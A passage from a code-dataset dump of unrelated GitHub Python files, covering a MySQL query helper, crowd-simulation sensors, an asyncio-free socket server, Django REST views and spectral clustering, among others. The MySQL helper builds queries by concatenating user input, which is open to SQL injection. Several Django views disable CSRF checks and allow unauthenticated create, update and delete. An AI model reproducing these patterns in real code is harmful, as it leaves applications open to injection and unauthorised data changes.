0:\n log.info(\"MYSQL loads data to table: {} successfully\".format(table_name))\n log.info(\"MYSQL loads data to table: {} successfully. Number of Records: {}\".format(table_name, cnt))\n except Exception as e:\n log.error(f'Error while loading data to MySQL. Sql insert error: \\n{sql}\\n{e} ')\n log.error(traceback.format_exc())\n raise e\n\n def get_similar_questions(self, ids, table_name) -> List:\n \"\"\"\n Gets the similar questions from MySQL\n\n :param ids: ids of the similar questions\n :param table_name: name of the table\n :return: list of similar questions\n \"\"\"\n str_ids = str(ids).replace('[', '').replace(']', '')\n sql = \"select question from \" + table_name + \" where id in (\" + str_ids + \") order by field (id,\" + str_ids + \");\"\n try:\n if ids is None or len(ids) == 0:\n return []\n with self.connection.cursor() as cursor:\n cursor.execute(sql)\n results = cursor.fetchall()\n results = [res[0] for res in results]\n return results\n except Exception as e:\n log.error(f'Error while getting similar questions: \\nSql: \\n{sql} \\n{e} ')\n log.error(traceback.format_exc())\n raise e\n\n def search_by_similar_questions(self, table_name, question=None) -> List:\n \"\"\"\n Searches for the answer by similar questions\n\n :param question: question\n :param table_name: name of the table\n :return: answer list\n \"\"\"\n sql = \"select answer from \" + table_name + \" where question = `None`;\"\n try:\n if question is None or len(question) == 0:\n raise Exception(\"Question is None or empty\")\n sql = \"select answer from \" + table_name + \" where question in ('\" + question[0] + \"');\"\n with self.connection.cursor() as cursor:\n cursor.execute(sql)\n rows = cursor.fetchall()\n if rows is None or len(rows) == 0:\n raise Exception(\"No answer found\")\n return rows\n except Exception as e:\n log.error(f'Error while searching by similar questions: \\nSql: \\n{sql} \\n{e} ')\n log.error(traceback.format_exc())\n return []\n\n","repo_name":"dellius-alexander/Vector-DB-SearchBot","sub_path":"src/database/mysql.py","file_name":"mysql.py","file_ext":"py","file_size_in_byte":8197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"305085231","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nA file containing all the imitation sensors used in applying the ukf\nto stationsim\n\"\"\"\n\nimport numpy as np\nimport shapely.geometry as geom\n\ndef generate_Camera_Rect(bl, tl, tr, br, boundary = None):\n \"\"\" Generate a square polygon \n \n Parameters\n ------\n br, br, tl, tr : `array_like`\n bottom left `bl`, bottom right `br`, top left `tl`, and top right `tr`.\n Basically, where are the corners of the rectangle.\n \n boundary : `Polygon`\n indicate if this rectangle is a boundary. If no arguement is given,\n the polygon generated does is not an intersect with some boundary.\n This arguement is None when we generate a boundary and is usually\n stationsims dimensions if we wish to cut off some square cameras\n accordingly.\n Returns\n ------\n poly : `Polygon`\n square polygon with defined corners.\n \"\"\"\n \n #build array of coordinates for shapely to read\n points = np.array([bl, tl, tr, br])\n #build polygon\n poly = geom.Polygon(points)\n #take the intersect with some bounadary else return it as is\n if boundary is not None:\n poly = poly.intersection(boundary) #cut off out of bounds areas\n \n return poly\n\ndef generate_Camera_Cone(pole, centre, arc, boundary):\n \"\"\"construct Polygon object containing cone\n\n I'd recommend knowing how polar coordinates work before reading this \n code. Particualy converting cartesian to polar and back.\n Parameters\n ------\n \n pole : array_like\n `pole` central point where the camera is. \n The vision arc segment originates about this point.\n \n centre : array_like\n `centre` indicates from the pole where the camera is facing.\n The distance of this point away from the pole also determines\n the radius of the cameras vision arc. Further away implies a \n larger more radius and a long field of vision.\n \n arc: float\n We choose a number 0 < x <= 1 that determines how wide the vision \n segment is. For example, if we choose arc = 0.25, the camera would form\n be a quarter circle of vision.\n \n boundary : Polygon\n `boundary` of ABM topography. E.g. rectangular corridor for \n stationsim. Indicates where to cut off polygons if they're out of\n bounds.\n\n Returns\n -------\n poly : Polygon\n `poly` polygon arc segment of the cameras vision.\n \"\"\"\n # convert arc from a proportion of a circle to radians\n angle = arc * np.pi*2 \n # difference between centre and pole.\n # determines which the radius and direction the camera points.\n diff = centre-pole \n # arc radius\n r = np.linalg.norm(diff) \n # angle the camera points in radians anticlockswise about east.\n centre_angle = np.arctan2(diff[1],diff[0]) \n \n # generate points for arc polygon\n # precision is how many points. more points means higher resolution\n # set to 100 can easily be less or more\n precision = angle/100\n \n #start to build coordinates\n #start by finding out the angle of each polygon point about east\n\n angle_range = np.arange(centre_angle - angle/2,\n centre_angle + angle/2 , precision)\n #convert these angles into x,y coordinates using the radius of the\n #camera r and the standard formula for polar to cartesian conversion\n x_range = pole[0] + r * np.cos(angle_range)\n y_range = pole[1] + r * np.sin(angle_range)\n \n if arc < 1:\n # if camera isnt a complete circle add central point to polygon\n # this essentially closes the loop making it a proper circle segment.\n x_range = np.append(x_range, pole[0])\n y_range = np.append(y_range, pole[1])\n \n #stack x and y coorindates and build polygon\n poly = geom.Polygon(np.column_stack([x_range,y_range]))\n #intersect with boundary to remove out of bounds elements.\n poly = poly.intersection(boundary) #cut off out of bounds areas\n \n return poly\n\nclass camera_Sensor():\n \"\"\"class for an imitation camera.\"\"\"\n \n def __init__(self, polygon):\n \"\"\"init the camera using a single polygon\n !!maybe extend this to a list of polygons\n\n Parameters\n ----------\n polygons : `Polygon`\n DESCRIPTION.\n\n Returns\n -------\n None.\n\n \"\"\"\n self.polygon = polygon\n \n def observe(self, state):\n \"\"\" determine what this camera observes of a model state at a given time\n \n if an item if in the arc segment polygon take its observations \n !!with noise?\n \n Parameters\n ------\n agents: list\n list of `agent` classes \n \n Returns\n ------\n which_in : list\n a list of the same shape a state indicating 1 if an agent is within a \n cameras vision and 0 otherwise.\n \"\"\"\n which_in = []\n \n state = np.reshape(state, (int(len(state)/2),2))\n \n \n for i in range(state.shape[0]):\n point = geom.Point(state[i,:]) \n \n is_in = point.within(self.polygon)\n if is_in:\n which_in += [i]\n \n return which_in\n \n \n\"WIP. Not yet working.\"\nclass footfall_Sensor():\n \"\"\"\n count how many people pass through a specified polygon.\n \"\"\"\n \n \n def __init__(self, polygon, positions):\n \"\"\"\n \n Parameters\n ------\n polygon : Polygon\n \"\"\"\n \n self.polygon = polygon\n self.agents = 0\n self.footfall_counts = []\n \n def count(self, agents):\n \n \"\"\" check if an agent posses through the footfall counter polygon\n \n draw lines between each new and old positions\n if lines intersect a polygon add one to count\n \"\"\"\n footfall_count = 0\n # create list of Lines indicating where agents travelled\n old_agents = self.agents\n\n for i, item in enumerate(agents):\n line = np.array([[item.location, old_agents[i].location]])\n line = geom.LineString(line) \n if line.intersects(self.polygon):\n footfall_count+=1\n self.footfall_counts.append(footfall_count)\n self.agents = agents\n ","repo_name":"Urban-Analytics/dust","sub_path":"Projects/ABM_DA/experiments/ukf_experiments/modules/sensors.py","file_name":"sensors.py","file_ext":"py","file_size_in_byte":6645,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"63"} +{"seq_id":"14765809695","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# Author: xiaotian\n\nfrom PIL import Image\n\n# table1 = \"\"\"$@B%8&WM#*oahkbdpqwmZO0QLCJUYXzcvunxrjft/\\|()1{}[]?-_+~<>i!lI;:,\"^`''. \"\"\"#这种方法好像不太好\ntable = '#8XOHLTI)i=+;:,. ' # 对于灰度图像效果不错\nim = Image.open(\"./1.jpg\")\nif im.mode != \"L\": # 如果不是灰度图像,转换为灰度图像\n im = im.convert(\"L\")\na = im.size[0]\nb = im.size[1]\nim = im.resize((200, 266)) # 转换图像大小,这个大小是我随意设置的\nf = open(\"./image.txt\", 'w+') # 目标文本文件\n\nfor i in range(1, b, 2): # 每隔一行取一行像素,是为了保持视觉上的横纵比\n line = ''\n for j in range(a):\n line += table[int((float(im.getpixel((j, i))) / 256.0) * len(table))] # 计算当前像素属于哪个字符\n line += \"\\n\" # 别忘了添加回车符\n f.write(line)\nf.close()","repo_name":"xiaotian666/spider","sub_path":"src/imageToStr.py","file_name":"imageToStr.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"8175514135","text":"from torch.optim.lr_scheduler import _LRScheduler\nfrom bisect import bisect_right\n\n# Based on https://github.com/pytorch/pytorch/blob/master/torch/optim/lr_scheduler.py\n\nclass LinearMultiStepWarmUp(_LRScheduler):\n def __init__(self, cfg, optimizer, last_epoch=-1):\n self.gamma = cfg.SOLVER.GAMMA\n self.milestones = cfg.SOLVER.MULTISTEP_MILESTONES\n self.warmup_period = cfg.SOLVER.WARMUP_PERIOD\n\n super().__init__(optimizer, last_epoch)\n \n def get_lr(self):\n if self.warmup_period > 0.0:\n warmup_factor = min(1.0, (self._step_count+1)/self.warmup_period)\n else:\n warmup_factor = 1.0\n\n return [base_lr * warmup_factor * self.gamma ** bisect_right(self.milestones, self.last_epoch)\n for base_lr in self.base_lrs]\n","repo_name":"andersfagerli/NTNU","sub_path":"TDT4265 - Computer Vision and Deep Learning/Project/SSD/ssd/engine/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"70349663560","text":"# RabuRetta Server\n\nimport socket\nimport time\nimport selectors\nimport types\nfrom enum import Enum\nfrom rrcommon import *\n\nclass RabuRettaServerSettings():\n\n def __init__(self):\n self.address = None\n self.timesleep = 60\n self.timetry = 5\n self.buffer_size = None\n self.f_table = {}\n self.new_conn = None\n self.on_error = None\n\nclass RabuRettaUserPrivilege(Enum):\n Admin = 1\n Ordinary = 2\n Unassigned = 3\n\nclass RabuRettaUser():\n\n def __init__(self, addr):\n self.addr = addr\n self.data_processor = RabuRettaDataProcessor()\n self.outgoing = b\"\"\n\n self.priv = RabuRettaUserPrivilege.Unassigned\n self.name = None\n self.age = None\n\n def __hash__(self):\n\n return self.addr\n\nclass RabuRettaServer():\n\n def __init__(self, rrss):\n self.sel = selectors.DefaultSelector()\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.users = {}\n self.buffer_size = rrss.buffer_size\n\n self.f_table = rrss.f_table\n self.new_conn = rrss.new_conn\n self.on_error = rrss.on_error\n\n attempt = rrss.timetry\n sock_addr = rrss.address\n\n while True:\n\n try:\n self.sock.bind(sock_addr)\n if (sock_addr[1] == 0):\n sock_addr = (sock_addr[0], self.get_port())\n\n except OSError:\n\n if attempt == 0:\n raise Exception(\n \"Could not bind socket to %s:%d.\" %\n sock_addr\n )\n\n print(\"Socket busy, retrying in 60s...\")\n time.sleep(rrss.timesleep)\n\n attempt -= 1\n\n continue\n\n else:\n print(\"Socket bound to %s:%d.\" % sock_addr)\n\n break\n\n self.sock.listen()\n\n print(\"Waiting for connections...\")\n\n self.sock.setblocking(False)\n self.sel.register(self.sock, selectors.EVENT_READ, data=None)\n\n while True:\n events = self.sel.select(timeout=None)\n\n for key, mask in events:\n\n if key.data is None:\n addr = self.accept_conn()\n else:\n self.process_data(key, mask, addr)\n\n def has_admin(self):\n\n return False if len(\n [ u for u in self.users.values()\n if u.priv == RabuRettaUserPrivilege.Admin\n ]) == 0 else True\n\n def get_port(self):\n\n return self.sock.getsockname()[1]\n\n def send_request(self, addr, request, message, data):\n self.users[addr].outgoing += RabuRettaCommon.package(\n RabuRettaServerRequest.create(\n request,\n message,\n data\n )\n )\n\n def accept_conn(self):\n conn, addr = self.sock.accept()\n conn.setblocking(False)\n\n print(\n \"Accepted connection from: %s\" %\n str(addr)\n )\n\n self.users[addr] = RabuRettaUser(addr)\n\n self.sel.register(\n conn,\n selectors.EVENT_READ | selectors.EVENT_WRITE,\n types.SimpleNamespace(\n inb=b'',\n outb=b''\n )\n )\n\n if self.new_conn is not None:\n self.new_conn(self, addr)\n\n return addr\n\n def process_request(self, addr, message):\n\n if message.comm in self.f_table:\n try:\n if self.f_table[message.comm](\n self,\n addr,\n *(el for el in message.data.split())\n ) == False:\n quit()\n\n except TypeError as e:\n self.server_error(\n addr,\n str(e)\n )\n\n else:\n self.server_error(\n addr,\n \"Invalid command '%s'\" % message.comm\n )\n\n def server_error(self, addr, error_message):\n\n if self.on_error:\n if self.on_error(addr, error_message) == False:\n quit()\n\n else:\n self.send_request(\n addr,\n \"error\",\n error_message,\n \"retry\"\n )\n\n def del_user(self, addr):\n\n if addr not in self.users:\n\n return\n\n del self.users[addr]\n\n def process_data(self, key, mask, addr):\n sock = key.fileobj\n\n if mask & selectors.EVENT_READ:\n data = sock.recv(self.buffer_size)\n\n if data and addr in self.users:\n self.users[addr].data_processor.add_data(\n data,\n lambda msg: self.process_request(addr, msg),\n RabuRettaComm\n )\n else:\n print(\n \"Closing connection to %s...\" %\n str(addr)\n )\n self.sel.unregister(sock)\n sock.close()\n\n if addr in self.users:\n del self.users[addr]\n\n elif mask & selectors.EVENT_WRITE:\n\n if addr in self.users and self.users[addr].outgoing:\n key.data.outb += self.users[addr].outgoing\n self.users[addr].outgoing = b\"\"\n\n if key.data.outb:\n sent_bytes = key.fileobj.send(key.data.outb)\n key.data.outb = key.data.outb[sent_bytes:]\n\n def __del__(self):\n print(\"Closing socket...\")\n self.sock.close()\n\n","repo_name":"StjepanPoljak/RabuRetta","sub_path":"rrserver.py","file_name":"rrserver.py","file_ext":"py","file_size_in_byte":5782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"40892951328","text":"import pygame\n\n\n# bmi计算器\nheight = float(input(\"输入身高(m):\"))\nweight = float(input(\"输入体重(kg):\"))\n\nbmi = weight / pow(height, 2)\nprint(\"BMI值为:{}\".format(bmi))\n\n# 从上到下依次匹配 满足多条件下执行第一条,后面被忽略\nif bmi <= 18.4:\n print(\"偏瘦\")\nelif bmi > 18.4 and bmi <= 23.9:\n print(\"正常\")\nelif bmi > 23.9 and bmi <= 27.9:\n print(\"过重\")\nelse:\n print(\"肥胖\")\n","repo_name":"wankcn/HouTu","sub_path":"Learn-Python/branch/sample2.py","file_name":"sample2.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"ja","doc_type":"code","stars":8,"dataset":"github-code","pt":"63"} +{"seq_id":"22794725393","text":"# -*- coding: utf-8 -*-\n'''\n@Time : 2022-10-23 14:33\n@Author : allen\n@File : learn_list.py\n\n'''\n\n'''\n 先有商品列表如下\n 1. product = [[\"iphone\",6888],[\"MacPro\",14800],[\"小米6\",2499],[\"Coffee\",31],[\"Book\",60],[\"Nike\",699]]\n 需要打印出以下格式:\n --- 商品列表 ---\n 0 iphone 6888\n 1 MacPro 14800\n 2 小米6 2499\n 3 Coffee 31\n 4 Book 60\n 5 Nike 699\n \n 2. 根据上面的products列表写一个循环,不断询问用户想买什么,用户选择一个商品编号,就把对应的商品添加到购物车里,最终用户输入q退出时,打印购买的商品列表\n'''\nproduct = [[\"iphone\",6888],[\"MacPro\",14800],[\"小米6\",2499],[\"Coffee\",31],[\"Book\",60],[\"Nike\",699]]\n\n# 题1\nprint(\"--- 商品列表 ---\")\nfor i in range(len(product)):\n detail = product[i]\n print(f\"{i} {detail[0]} {detail[1]}\")\n\n# 题2\n# 用java中map的思想,1,2,3,4,5对应5个元组,匹配到就加入购物车咯,没匹配到给提示语即可\n# 购物车用一个list存储即可\n\nprint(\"--- 商品列表 ---\")\npro_map = {}\nfor i in range(len(product)):\n detail = product[i]\n pro_map[str(i)] = detail\nprint(f\"商品信息,{pro_map}\")\nprint(f\"商品信息,{pro_map.keys()}\")\n\nreturn_list = []\nstr = \"start\"\nwhile str != \"q\":\n str = input(\"请商品编号,输入q结束:\\n\")\n if str not in pro_map.keys():\n print(\"编号查无商品,请重新输入:\")\n else:\n return_list.append(pro_map.get(str))\nprint(f\"最终购物车信息为:{return_list}\")\n","repo_name":"Wuaoyang/python_learn","sub_path":"python_learn/LearnList.py","file_name":"LearnList.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"10286499858","text":"from django.shortcuts import render\r\nfrom .models import Category,Customer,Product\r\nfrom .serializers import CategorySerializer,CustomerSerializer,ProductSerializer\r\nfrom rest_framework import generics\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.decorators import api_view,permission_classes\r\nfrom rest_framework import status\r\nfrom rest_framework.permissions import AllowAny\r\nfrom datetime import datetime,timedelta\r\n\r\n\r\n# Create your views here.\r\n\r\n@csrf_exempt\r\n@api_view(['GET','POST'])\r\n@permission_classes((AllowAny,))\r\ndef ListCustomer(request):\r\n if request.method == 'GET':\r\n customers = Customer.objects.all()\r\n serializer = CustomerSerializer(customers,many=True)\r\n return Response(serializer.data)\r\n elif request.method == 'POST':\r\n serializer = CustomerSerializer(data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data,status=201)\r\n else:\r\n return Response(serializer.errors,status=400)\r\n \r\n \r\n\r\n\r\n@csrf_exempt\r\n@api_view(['GET','PUT','PATCH','DELETE'])\r\n@permission_classes((AllowAny,))\r\ndef DetailCustomer(request,pk):\r\n customer=Customer.objects.get(pk=pk)\r\n if request.method =='GET':\r\n serializer =CustomerSerializer(customer)\r\n return Response(serializer.data)\r\n elif request.method == 'PUT':\r\n serializer = CustomerSerializer(customer, data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data,status=201)\r\n else:\r\n return Response(serializer.errors, status=400) \r\n \r\n elif request.method == 'PATCH':\r\n serializer = CustomerSerializer(customer,data=request.data,partial=True)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data,status=201)\r\n else:\r\n return Response(serializer.errors,status=400)\r\n \r\n elif request.method == 'DELETE':\r\n customer.delete()\r\n return Response(status=204)\r\n \r\n@csrf_exempt\r\n@api_view(['GET','POST'])\r\n@permission_classes((AllowAny,))\r\ndef ProductList(request):\r\n if request.method == 'GET':\r\n products = Product.objects.all()\r\n serializer = ProductSerializer(products, many=True)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'POST':\r\n serializer = ProductSerializer(data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response(serializer.data, status=201)\r\n else:\r\n return Response(serializer.errors, status=400)\r\n \r\n\r\n@csrf_exempt\r\n@api_view(['GET','PUT','PATCH','DELETE'])\r\n@permission_classes((AllowAny,))\r\ndef ProductDetail(request,pk):\r\n product = Product.objects.get(pk=pk)\r\n if request.method == 'GET':\r\n serializer = ProductSerializer(product)\r\n return Response(serializer.data)\r\n\r\n elif request.method == 'PUT':\r\n serializer = ProductSerializer(product, data=request.data)\r\n if serializer.is_valid():\r\n serializer.save()\r\n \r\n return Response(serializer.data,status=201)\r\n else:\r\n return Response(serializer.errors, status=400)\r\n\r\n elif request.method == 'PATCH':\r\n serializer = ProductSerializer(product, data=request.data, partial=True)\r\n if serializer.is_valid():\r\n \r\n registration_date = product.product_added_on\r\n two_months_ago = datetime.now() - timedelta(days=60)\r\n if registration_date <= two_months_ago:\r\n product.product_active = False\r\n serializer.save()\r\n return Response(serializer.data,status=201)\r\n else:\r\n return Response(serializer.errors, status=400)\r\n\r\n elif request.method == 'DELETE':\r\n product.delete()\r\n return Response(status=204)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n ","repo_name":"Alfinalfi/task_ecommerce","sub_path":"django_ecommerce/ecommerce/ecommerce/shopapi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"69886909960","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport random\nimport math\n\nfrom sklearn.cluster import KMeans\nfrom scipy.fftpack import fft, dctn, idctn\n\nfrom fn.data_functions import convert_one_hot\nfrom fn.map_functions import plot_sample\n\n\ndef get_affinity(mat, sig, diag_zero=True, compute_dist=True, view_mat=False, view_hist=False):\n def get_distance(mat_, normalize=True):\n if normalize:\n for dim in range(mat_.shape[0]):\n mat_[dim, :, :] = (mat_[dim, :, :] - np.amin(mat_[dim, :, :])) / (\n np.amax(mat_[dim, :, :]) - np.amin(mat_[dim, :, :]))\n\n # need to flatten the matrix first.\n mat_ = np.reshape(mat_, [8, -1])\n\n distance_mat = np.zeros([mat_.shape[-1], mat_.shape[-1]])\n\n for var1 in range(mat_.shape[-1]):\n for var2 in range(mat_.shape[-1]):\n distance_mat[var1, var2] = np.sum((mat_[:, var1] - mat_[:, var2]) ** 2) ** 0.5\n\n return distance_mat\n\n print('computing affinity matrix for \\u03C3 = ' + str(round(sig, 2)))\n if compute_dist:\n dist_mat = get_distance(mat, normalize=True)\n else:\n dist_mat = np.copy(mat)\n\n affinity_mat = np.exp(-1 * (dist_mat ** 2) / (2 * (sig ** 2)))\n\n if diag_zero:\n np.fill_diagonal(affinity_mat, 0)\n\n if view_mat:\n plt.figure(figsize=(8, 4))\n plt.subplot(121), plt.imshow(dist_mat), plt.colorbar()\n plt.title('euclidean distance matrix')\n plt.subplot(122), plt.imshow(affinity_mat), plt.colorbar()\n plt.title('affinity matrix with \\u03C3 = ' + str(round(sig, 2)))\n plt.show()\n\n if view_hist:\n affinity_temp = np.reshape(affinity_mat, (-1))\n plt.figure(figsize=(6, 4))\n sns.displot(affinity_temp, kind='kde')\n plt.show()\n\n return affinity_mat\n\n\ndef get_laplacian(mat, normalize=True, symmetry=True, view=False):\n print('computing laplacian..')\n\n # creating degree matrix. sum of values in each row of affinity matrix.\n degree = np.zeros_like(mat)\n for i in range(degree.shape[0]):\n degree[i, i] = np.sum(mat[i, :])\n\n # print('degree =\\n' + str(np.round(degree, 2)))\n\n if normalize:\n if symmetry:\n degree_sq = (np.linalg.inv(degree)) ** 0.5\n # print('degree inverse sqrt =\\n' + str(np.round(degree_sq, 2)))\n laplacian = np.matmul(np.matmul(degree_sq, mat), degree_sq)\n else:\n degree_sq = (np.linalg.inv(degree))\n laplacian = np.identity(mat.shape[0]) - np.matmul(degree_sq, mat)\n else:\n laplacian = degree - mat\n if view:\n plots, names = np.array([laplacian, degree]), ['Laplacian\\nnormalized = ' + str(normalize), 'degree matrix']\n plt.figure(figsize=(4 * plots.shape[0], 4))\n for i in range(plots.shape[0]):\n plt.subplot(1, 3, i + 1), plt.title(names[i]), plt.imshow(plots[i, :, :])\n plt.show()\n return laplacian\n\n\ndef get_eigen(mat, sig=None, absolute=True, eigengap_only=False, view=False):\n print('get eigen...')\n\n [eig_val, eig_vec] = np.linalg.eig(mat)\n if absolute:\n eig_val = np.abs(eig_val)\n eigen_gap = np.abs(np.diff(eig_val))\n\n else:\n eigen_gap = np.diff(eig_val)\n\n if view:\n plt.figure(figsize=(12, 4))\n plt.subplot(121), plt.stem(eig_val), plt.xlim([-1, 10]), plt.ylim([0, 1])\n plt.title('eigen-values for \\u03C3 = ' + str(round(sig, 2)))\n plt.xlabel('eigen-index'), plt.ylabel('eigen-value')\n plt.subplot(122), plt.stem(eigen_gap), plt.xlim([-1, 10]), plt.ylim([0, 1])\n plt.title('eigen-gap for \\u03C3 = ' + str(round(sig, 2)))\n plt.xlabel('eigen-index'), plt.ylabel('eigen-gap')\n plt.show()\n\n if eigengap_only:\n return eigen_gap\n else:\n return eigen_gap, eig_val, eig_vec\n\n\ndef sigma_optimum(test_sample, k, sig_range=None, cluster=False, method='Weiss', abs_eig=True, view_sample=False,\n view_sig=False, view_clusters=False):\n \"\"\"In this function, we set 'k' which is the amount of clusters we need, and find the\n OPTIMAL SIGMA value for that k, where the sigma corresponding to the LARGEST Kth EIGEN-GAP wins.\n It makes the most sense compared to just going over everything for now because in some cases\n we get 1--2 clusters as optimal for sigma values.\"\"\"\n print('sigma sweep function...')\n\n def sigma_sweep(test_sample_, sig_range_, method_, abs_eig_):\n # set the diagonal of the affinity mat to zero or not\n if 'weiss' in method_.lower() or 'ng' in method_.lower():\n diag_zero_ = True\n print('computation according to Ng and Weiss. Diagonal elements of the Affinity matrix (A) will be zero')\n elif 'von' in method_.lower() or 'luxburg' in method_.lower():\n diag_zero_ = False\n print('computation according to Von Luxburg. Diagonal elements of the Affinity matrix (A) will be 1')\n else:\n diag_zero_ = True\n print('Cannot detect method.\\ncomputation according to Ng and Weiss. Diagonal elements of the Affinity '\n 'matrix (A) will be zero')\n\n # some initializations for later analysis\n eig_gaps_, eig_vals_, eig_vecs_ = [], [], []\n\n sig_list_ = np.linspace(sig_range_[0], sig_range_[1], 10)\n\n \"\"\" sigma sweep starts here \"\"\"\n print('sigma sweep starts here...')\n\n for num_ in range(len(sig_list_)):\n sig_ = sig_list_[num_]\n affinity = get_affinity(test_sample_, sig_, diag_zero=diag_zero_, compute_dist=True, view_mat=False,\n view_hist=False)\n # computing laplacian\n laplacian = get_laplacian(affinity, normalize=True, symmetry=True,\n view=False)\n\n # computing eigenvalues and eigen-gaps\n eigen_gap_, eigen_val_, eigen_vec_ = get_eigen(laplacian, sig_, absolute=abs_eig_, eigengap_only=False,\n view=False)\n eig_gaps_.append(eigen_gap_)\n eig_vecs_.append(eigen_vec_)\n eig_vals_.append(eigen_val_)\n\n return np.array(eig_gaps_), np.array(eig_vecs_), np.array(eig_vals_)\n\n if sig_range is None:\n sig_range = [0.1, 0.3]\n sig_list = np.linspace(sig_range[0], sig_range[1], 10)\n\n eig_gaps, eig_vecs, eig_vals = sigma_sweep(test_sample, sig_range, method, abs_eig)\n sig_opt = sig_list[np.argmax(np.abs(eig_gaps[:, k]))]\n\n if cluster:\n for num in range(len(sig_list)):\n eigen_vec = eig_vecs[num]\n cluster_spectral(test_sample, k, sig_list[num], eigen_vec=eigen_vec, view_sample=False)\n\n print('optimal \\u03C3 value for (k=' + str(k) + ') is: ' + str(round(sig_opt, 3)))\n print('the corresponding eigen-gap value is: ' + str(round(np.amax(eig_gaps), 3)))\n\n if view_sample:\n plot_sample(test_sample)\n\n if view_sig:\n plt.figure(figsize=(6, 4))\n plt.stem(sig_list, eig_gaps[:, k])\n plt.ylabel('eigen-gap for k = ' + str(k)), plt.xlabel('\\u03C3')\n plt.show()\n\n return sig_opt\n\n\ndef cluster_spectral(test_sample, k, sig, eigen_vec=None, return_2d=True, method='Ng and Weiss', view_clusters=False,\n view_sample=False):\n print('spectral clustering....')\n\n if 'weiss' in method.lower() or 'ng' in method.lower():\n diag_zero = True\n elif 'von' in method.lower() or 'luxburg' in method.lower():\n diag_zero = False\n else:\n diag_zero = True\n\n if eigen_vec is None:\n A = get_affinity(test_sample, sig, diag_zero)\n L = get_laplacian(A)\n _, _, eigen_vec = get_eigen(L, sig)\n else:\n pass\n\n # extracting the 'k' eigenvectors corresponding to the optimal mode k\n mode_x = eigen_vec[:, 0:k]\n mode_y = np.zeros_like(mode_x)\n for row in range(mode_x.shape[0]):\n mode_y[row, :] = mode_x[row, :] / (np.sum(mode_x[row, :] ** 2) ** 0.5)\n\n title = 'Algorithm: Spectral Clustering according to ' + method + '\\nunsupervised clusters for k=' + str(\n k) + 'and \\u03C3=' + str(round(sig, 3))\n\n labels, labels_one_hot = cluster_kmeans(test_sample, k, feature_mat=mode_y, return_2d=True,\n view_clusters=view_clusters,\n view_sample=view_sample, title=title)\n\n return labels, labels_one_hot\n\n\ndef cluster_kmeans(test_sample, k, feature_mat=None, return_2d=True, view_clusters=False, view_sample=False,\n title=None):\n print('kmean clustering...')\n\n if feature_mat is None:\n feature_mat = np.transpose(test_sample, (1, 2, 0))\n feature_mat = np.reshape(feature_mat, (-1, feature_mat.shape[-1]))\n\n k_mean = KMeans(n_clusters=k)\n k_mean.fit(feature_mat)\n\n cluster_labels = k_mean.labels_\n\n one_hot_ranked = convert_one_hot(cluster_labels, k, rank=True)\n\n one_hot_2d = np.reshape(one_hot_ranked, (k, test_sample.shape[-2], test_sample.shape[-1]))\n labels_2d = np.reshape(cluster_labels, (test_sample.shape[-2], test_sample.shape[-1]))\n\n if view_sample:\n plot_sample(test_sample)\n\n if view_clusters:\n if title is None:\n title = 'k-means clustering where k=' + str(k)\n cols = 4\n rows = math.ceil((k + 1) / cols)\n plt.figure(figsize=(cols * 4, rows * 4))\n for i in range(k + 1):\n plt.subplot(rows, cols, i + 1)\n if i == k:\n plt.imshow(labels_2d)\n plt.title('segmented image (segments in no specific order)')\n else:\n plt.imshow(one_hot_2d[i, :, :])\n plt.title('cluster label = ' + str(i + 1))\n plt.suptitle(title)\n plt.show()\n\n return labels_2d, one_hot_2d\n\n\ndef dct_image(img1, scale_down, filter_size=8, view=False, title=None):\n print('scale down image...')\n\n def dct_single(img, scale, filter_=8, view_=False, title_=None):\n if title_ is None:\n title_ = str(scale_down) + 'x compressed image after DCT-II\\nFilter size: ' + str(filter_)\n else:\n pass\n\n sample_size = math.floor(filter_ / scale_down)\n\n x_len = int(filter_ * math.floor(img.shape[1] / filter_))\n y_len = int(filter_ * math.floor(img.shape[0] / filter_))\n\n img = img[0:y_len, 0:x_len]\n samples_x = int(img.shape[1] / filter_)\n samples_y = int(img.shape[0] / filter_)\n\n img_new = np.zeros((samples_y * sample_size, samples_x * sample_size))\n\n for i in range(samples_y):\n for j in range(samples_x):\n img_seg = img[filter_ * i: filter_ * (i + 1), filter_ * j: filter_ * (j + 1)]\n dct_seg = dctn(img_seg)\n img_sampled = idctn(dct_seg, shape=(sample_size, sample_size))\n img_sampled = img_sampled * np.mean(img_seg) / np.mean(img_sampled)\n img_new[sample_size * i: sample_size * (i + 1), sample_size * j: sample_size * (j + 1)] = img_sampled\n\n if view_:\n plt.figure(figsize=(8, 4))\n plt.subplot(121), plt.imshow(img)\n plt.title('Original image')\n plt.clim(0, 1)\n plt.subplot(122), plt.imshow(img_new)\n plt.title(title_)\n plt.clim(0, 1)\n plt.show()\n\n return img_new\n\n if len(img1.shape) == 3:\n dct_multi = []\n for i in range(img1.shape[0]):\n 